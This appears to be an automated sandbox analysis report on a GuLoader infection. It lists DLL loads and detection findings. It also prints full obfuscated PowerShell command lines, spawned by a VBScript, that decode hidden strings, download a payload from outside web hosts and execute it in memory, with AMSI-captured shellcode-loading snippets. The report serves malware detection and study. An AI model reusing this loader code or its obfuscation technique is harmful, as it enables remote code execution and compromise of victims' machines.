                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 0000000D.00000002.3007386911.00000000088DC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 0000000D.00000002.3007386911.00000000088DC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bqm.Core.pdbk%. source: powershell.exe, 00000003.00000002.2994471945.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbh* source: powershell.exe, 0000000D.00000002.3007386911.00000000088DC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdb source: powershell.exe, 0000000D.00000002.3007386911.00000000088DC000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Back", "0")
                Yara detected GuLoader
                Source: Yara matchFile source: 0000000D.00000002.3010102777.00000000093F8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3009830542.00000000091F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3008275898.0000000007F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2989299356.0000000005D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2981270459.000000000554E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1843130154.000001E7E1F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Overcapitalize)$GLObal:pentAstomum = [SYSTeM.Text.ENCODiNg]::AScii.gEtStrINg($FrAfRSeLEN)$GLoBal:hURTIGrUTErS=$PeNtasTOMuM.SUbString($caTfaCING,$pHOniNG197)<#tidsrammers Viktualiefor
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Brneopsparingers $tonguecraft $Seneskedebetndelse), (Eftertankers @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bindeordets = [AppDomain]::CurrentDomain.
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Beregningsgrundlaget)), $Concretistic).DefineDynamicModule($Akademiseres, $false).DefineType($Plutonium1, $Teposer, [System.MulticastD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Overcapitalize)$GLObal:pentAstomum = [SYSTeM.Text.ENCODiNg]::AScii.gEtStrINg($FrAfRSeLEN)$GLoBal:hURTIGrUTErS=$PeNtasTOMuM.SUbString($caTfaCING,$pHOniNG197)<#tidsrammers Viktualiefor
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Anachronistical $Unseraphicalurachesmiled $Bidragspligtiges), (Denitrification @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kommandonavns = [AppDomain]:
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Autotelism186)), $Fugl).DefineDynamicModule($Multikunsts, $false).DefineType($Rhynchota, $Bugserbaade, [System.MulticastDelegate])$Dia
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Disponeret)$GloBal:shImONOsEKI = [SysTEM.tExT.eNCOding]::ASCII.geTStriNG($eTHyLsulpHURIc)$gLObAL:kOinON=$shImoNOSEki.sUBstRING($benAaDniNgERNE,$ReNummERERiNgSFunktionenS164)<#eftersy
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whil
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whil
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (Ructatio
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= 